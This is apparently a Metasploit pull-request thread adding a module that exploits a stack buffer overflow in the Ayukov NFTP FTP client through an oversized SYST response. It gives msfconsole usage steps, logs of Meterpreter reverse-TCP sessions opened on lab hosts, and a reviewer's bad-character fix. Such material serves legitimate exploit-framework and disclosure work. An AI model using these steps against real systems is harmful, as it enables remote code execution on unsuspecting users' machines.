Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow

[DanielRTeixeira]

This PR adds a module to exploit a remote buffer overflow in the Ayukov NFTP FTP Client.

Tested on: Windows XP Professional SP3 EN x86

Verification

List the steps needed to make sure this thing works

• Install the application
• Start msfconsole
• use exploit/windows/ftp/ayukov_nftp
• Set the payload
• Exploit
• Connect to the FTP server using the NFTP FTP client
• Get a session

Example

msf > use exploit/windows/ftp/ayukov_nftp
msf exploit(windows/ftp/ayukov_nftp) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ayukov_nftp) > set LHOST 192.168.216.5 
LHOST => 192.168.216.5
msf exploit(windows/ftp/ayukov_nftp) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.216.5:4444 
msf exploit(windows/ftp/ayukov_nftp) > [*] Server started.
[*] Sending stage (179779 bytes) to 192.168.216.156
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.156:1046) at 2017-12-31 10:05:50 -0500

[wchen-r7]

I am not getting a session from the exploit. It looks like there is something wrong with the payload... looking into it.

[wchen-r7]

This time testing from a different network works:

msf exploit(windows/ftp/ayukov_nftp) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.12:4444 
[*] Server started.
msf exploit(windows/ftp/ayukov_nftp) > [*] Sending stage (179779 bytes) to 192.168.0.15
[*] Meterpreter session 1 opened (192.168.0.12:4444 -> 192.168.0.15:1126) at 2018-01-03 19:53:13 -0600

[wchen-r7]

Trying out a different network still works for me. Well, that was spooky:

msf exploit(windows/ftp/ayukov_nftp) > run
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Server started.
msf exploit(windows/ftp/ayukov_nftp) > [*] Sending stage (179779 bytes) to 172.16.249.204
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.204:1146) at 2018-01-03 19:55:58 -0600

[wchen-r7]

I think I figured out why I was seeing that problem. You might have a bad char somewhere. I'll try to find it.

[wchen-r7]

OK, I think I've fixed it. Turns out you are missing a 0x0d as a bad character. Now it's working:

msf exploit(windows/ftp/ayukov_nftp) > [*] 172.16.249.204 - connected
[*] 172.16.249.204 - sending 331 OK
[*] 172.16.249.204 - sending 230 OK
[*] 172.16.249.204 - sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.249.204
[*] Meterpreter session 7 opened (172.16.249.1:4444 -> 172.16.249.204:1181) at 2018-01-03 20:45:22 -0600

I'll be landing this now. Thanks @DanielRTeixeira

[wchen-r7]

Release Notes

This module exploits a buffer overflow vulnerability against Ayukov NFTP FTP Client. By responding the SYST request with a long string of data, a malicious server may cause a stack buffer overflow condition on the client, and result in arbitrary remote code execution.